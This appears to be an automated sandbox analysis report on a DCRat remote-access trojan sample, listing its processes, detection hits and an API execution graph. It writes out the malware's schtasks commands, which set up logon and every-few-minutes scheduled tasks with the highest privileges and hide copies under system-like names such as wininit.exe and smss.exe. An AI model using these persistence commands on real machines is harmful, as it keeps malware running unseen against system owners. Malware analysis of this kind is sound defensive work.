                MD5 hash:FF00E0480075B095948000BDC66E81F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:3
                Start time:07:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "
                Imagebase:0x790000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:07:37:01
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:07:37:01
                Start date:19/04/2024
                Path:C:\ReviewHost\brokercrt.exe
                Wow64 process (32bit):false
                Commandline:"C:\ReviewHost\brokercrt.exe"
                Imagebase:0xaf0000
                File size:848'384 bytes
                MD5 hash:96B975481850ADD8CCB0353227ECEB87
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2112725978.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                • Detection: 88%, ReversingLabs
                • Detection: 79%, Virustotal, Browse
                Reputation:low
                Has exited:true

                Target ID:6
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:7
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:9
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:07:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:13
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:14
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:15
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\WinStore.App.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:16
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:17
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 5 /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:18
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:19
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:20
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:21
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:22
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:23
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:24
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:25
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:26
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:27
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Recovery\smss.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:28
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:29
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:30
                Start time:07:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:31
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:32
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:33
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:34
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:35
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\Default User\Recent\AFKwztugVSPq.exe"
                Imagebase:0x1d0000
                File size:848'384 bytes
                MD5 hash:96B975481850ADD8CCB0353227ECEB87
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 88%, ReversingLabs
                • Detection: 79%, Virustotal, Browse
                Has exited:true

                Target ID:36
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:37
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Users\Public\Videos\AFKwztugVSPq.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\Videos\AFKwztugVSPq.exe
                Imagebase:0x7e0000
                File size:848'384 bytes
                MD5 hash:96B975481850ADD8CCB0353227ECEB87
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 88%, ReversingLabs
                • Detection: 79%, Virustotal, Browse
                Has exited:true

                Target ID:38
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:39
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "cscript" /sc ONLOGON /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:41
                Start time:07:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
                Imagebase:0x7ff67be70000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true


                  Execution Graph

                  Execution Coverage:9.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.3%
                  Total number of Nodes:1477
                  Total number of Limit Nodes:31
23465->23464 23467 f396e8 FindCloseChangeNotification 23465->23467 23466->23309 23467->23464 23470 f4e360 23469->23470 23471 f3a13a DeleteFileW 23470->23471 23472 f3984c 23471->23472 23473 f3a14d 23471->23473 23472->23309 23474 f3b66c 2 API calls 23473->23474 23475 f3a161 23474->23475 23475->23472 23476 f3a165 DeleteFileW 23475->23476 23476->23472 23477->23466 23479 f4aa40 23478->23479 23480 f4aaf3 ExpandEnvironmentStringsW 23479->23480 23481 f4ab16 23479->23481 23480->23481 23481->23323 23482->23323 23483->23323 23484->23337 23485->23323 23486->23323 23487->23323 23489 f58606 23488->23489 23490 f58613 23489->23490 23491 f5861e 23489->23491 23501 f58518 23490->23501 23493 f58626 23491->23493 23499 f5862f __dosmaperr 23491->23499 23494 f584de _free 20 API calls 23493->23494 23497 f5861b 23494->23497 23495 f58634 23508 f5895a 20 API calls __dosmaperr 23495->23508 23496 f58659 HeapReAlloc 23496->23497 23496->23499 23497->23323 23499->23495 23499->23496 23509 f571ad 7 API calls 2 library calls 23499->23509 23502 f58556 23501->23502 23506 f58526 __dosmaperr 23501->23506 23511 f5895a 20 API calls __dosmaperr 23502->23511 23503 f58541 RtlAllocateHeap 23505 f58554 23503->23505 23503->23506 23505->23497 23506->23502 23506->23503 23510 f571ad 7 API calls 2 library calls 23506->23510 23508->23497 23509->23499 23510->23506 23511->23505 23513 f3feba 23512->23513 23541 f31789 23513->23541 23515 f3fed2 23515->23341 23517 f3fead 23516->23517 23518 f31789 76 API calls 23517->23518 23519 f3fed2 23518->23519 23519->23343 23521 f37c72 __EH_prolog 23520->23521 23558 f3c827 23521->23558 23523 f37c8d 23564 f4e24a 23523->23564 23525 f37cb7 23570 f4440b 23525->23570 23528 f37ddf 23529 f37de9 23528->23529 23534 f37e53 23529->23534 23602 f3a4c6 23529->23602 23531 f37f06 23531->23347 23532 f37ec4 23532->23531 23608 f36dc1 74 API calls 23532->23608 23534->23532 23536 f3a4c6 8 API calls 23534->23536 23580 f3837f 23534->23580 23536->23534 23538 f37d09 23537->23538 23540 f37d10 23537->23540 23539 
f41acf 84 API calls 23538->23539 23539->23540 23542 f3179f 23541->23542 23553 f317fa __vswprintf_c_l 23541->23553 23543 f317c8 23542->23543 23554 f36e91 74 API calls __vswprintf_c_l 23542->23554 23545 f31827 23543->23545 23548 f317e7 new 23543->23548 23547 f535de 22 API calls 23545->23547 23546 f317be 23555 f36efd 75 API calls 23546->23555 23550 f3182e 23547->23550 23548->23553 23556 f36efd 75 API calls 23548->23556 23550->23553 23557 f36efd 75 API calls 23550->23557 23553->23515 23554->23546 23555->23543 23556->23553 23557->23553 23559 f3c831 __EH_prolog 23558->23559 23560 f4e24a new 8 API calls 23559->23560 23561 f3c874 23560->23561 23562 f4e24a new 8 API calls 23561->23562 23563 f3c898 23562->23563 23563->23523 23567 f4e24f new 23564->23567 23565 f4e27b 23565->23525 23567->23565 23576 f571ad 7 API calls 2 library calls 23567->23576 23577 f4ecce RaiseException Concurrency::cancel_current_task new 23567->23577 23578 f4ecb1 RaiseException Concurrency::cancel_current_task 23567->23578 23571 f44415 __EH_prolog 23570->23571 23572 f4e24a new 8 API calls 23571->23572 23573 f44431 23572->23573 23574 f37ce6 23573->23574 23579 f406ba 78 API calls 23573->23579 23574->23528 23576->23567 23579->23574 23581 f38389 __EH_prolog 23580->23581 23609 f31380 23581->23609 23583 f383a4 23617 f39ef7 23583->23617 23589 f383d3 23737 f31631 23589->23737 23590 f3846e 23636 f38517 23590->23636 23594 f384ce 23640 f31f00 23594->23640 23597 f383cf 23597->23589 23597->23590 23599 f3a4c6 8 API calls 23597->23599 23741 f3bac4 CompareStringW 23597->23741 23598 f384d9 23598->23589 23644 f33aac 23598->23644 23654 f3857b 23598->23654 23599->23597 23603 f3a4db 23602->23603 23607 f3a4df 23603->23607 23988 f3a5f4 23603->23988 23605 f3a4ef 23606 f3a4f4 FindClose 23605->23606 23605->23607 23606->23607 23607->23529 23608->23531 23610 f31385 __EH_prolog 23609->23610 23611 f3c827 8 API calls 23610->23611 23612 f313bd 23611->23612 23613 f4e24a new 8 API calls 23612->23613 23616 f31416 ___scrt_fastfail 
23612->23616 23614 f31403 23613->23614 23614->23616 23743 f3b07d 23614->23743 23616->23583 23618 f39f0e 23617->23618 23620 f383ba 23618->23620 23759 f36f5d 76 API calls 23618->23759 23620->23589 23621 f319a6 23620->23621 23622 f319b0 __EH_prolog 23621->23622 23632 f31a00 23622->23632 23634 f319e5 23622->23634 23760 f3709d 23622->23760 23624 f31b50 23763 f36dc1 74 API calls 23624->23763 23626 f33aac 97 API calls 23630 f31bb3 23626->23630 23627 f31b60 23627->23626 23627->23634 23628 f31bff 23628->23634 23635 f31c32 23628->23635 23764 f36dc1 74 API calls 23628->23764 23630->23628 23631 f33aac 97 API calls 23630->23631 23631->23630 23632->23624 23632->23627 23632->23634 23633 f33aac 97 API calls 23633->23635 23634->23597 23635->23633 23635->23634 23637 f38524 23636->23637 23782 f40c26 GetSystemTime SystemTimeToFileTime 23637->23782 23639 f38488 23639->23594 23742 f41359 72 API calls 23639->23742 23642 f31f05 __EH_prolog 23640->23642 23641 f31f39 23641->23598 23642->23641 23784 f31951 23642->23784 23645 f33ab8 23644->23645 23646 f33abc 23644->23646 23645->23598 23647 f33af7 23646->23647 23648 f33ae9 23646->23648 23919 f327e8 97 API calls 3 library calls 23647->23919 23652 f33b29 23648->23652 23918 f33281 85 API calls 3 library calls 23648->23918 23651 f33af5 23651->23652 23920 f3204e 74 API calls 23651->23920 23652->23598 23655 f38585 __EH_prolog 23654->23655 23656 f385be 23655->23656 23664 f385c2 23655->23664 23942 f484bd 99 API calls 23655->23942 23657 f385e7 23656->23657 23660 f3867a 23656->23660 23656->23664 23658 f38609 23657->23658 23657->23664 23943 f37b66 151 API calls 23657->23943 23658->23664 23944 f484bd 99 API calls 23658->23944 23660->23664 23921 f35e3a 23660->23921 23664->23598 23665 f38705 23665->23664 23927 f3826a 23665->23927 23668 f38875 23669 f3a4c6 8 API calls 23668->23669 23673 f388e0 23668->23673 23669->23673 23671 f3c991 80 API calls 23675 f3893b _memcmp 23671->23675 23672 f38a70 23674 f38b43 23672->23674 23681 f38abf 23672->23681 23931 f37d6c 
23673->23931 23679 f38b9e 23674->23679 23691 f38b4e 23674->23691 23675->23664 23675->23671 23675->23672 23676 f38a69 23675->23676 23945 f38236 82 API calls 23675->23945 23946 f31f94 74 API calls 23675->23946 23947 f31f94 74 API calls 23676->23947 23689 f38b30 23679->23689 23950 f380ea 96 API calls 23679->23950 23680 f38b9c 23683 f39653 79 API calls 23680->23683 23684 f3a180 4 API calls 23681->23684 23681->23689 23682 f39653 79 API calls 23682->23664 23683->23664 23688 f38af7 23684->23688 23686 f38c09 23687 f38c74 23686->23687 23736 f391c1 pre_c_initialization 23686->23736 23951 f39989 23686->23951 23692 f3aa88 8 API calls 23687->23692 23688->23689 23948 f39377 96 API calls 23688->23948 23689->23680 23689->23686 23691->23680 23949 f37f26 100 API calls pre_c_initialization 23691->23949 23695 f38cc3 23692->23695 23693 f38c4c 23693->23687 23955 f31f94 74 API calls 23693->23955 23697 f3aa88 8 API calls 23695->23697 23715 f38cd9 23697->23715 23699 f38c62 23956 f37061 75 API calls 23699->23956 23701 f38d9c 23702 f38df7 23701->23702 23703 f38efd 23701->23703 23704 f38e69 23702->23704 23707 f38e07 23702->23707 23705 f38f23 23703->23705 23706 f38f0f 23703->23706 23724 f38e27 23703->23724 23708 f3826a CharUpperW 23704->23708 23712 f42c42 75 API calls 23705->23712 23711 f392e6 121 API calls 23706->23711 23709 f38e4d 23707->23709 23716 f38e15 23707->23716 23710 f38e84 23708->23710 23709->23724 23959 f37907 108 API calls 23709->23959 23720 f38eb4 23710->23720 23721 f38ead 23710->23721 23710->23724 23711->23724 23714 f38f3c 23712->23714 23962 f428f1 121 API calls 23714->23962 23715->23701 23957 f39b21 SetFilePointer GetLastError SetEndOfFile 23715->23957 23958 f31f94 74 API calls 23716->23958 23961 f39224 94 API calls __EH_prolog 23720->23961 23960 f37698 84 API calls pre_c_initialization 23721->23960 23727 f3904b 23724->23727 23963 f31f94 74 API calls 23724->23963 23726 f39156 23728 f3a444 4 API calls 23726->23728 23726->23736 23727->23726 23729 f39104 23727->23729 23727->23736 
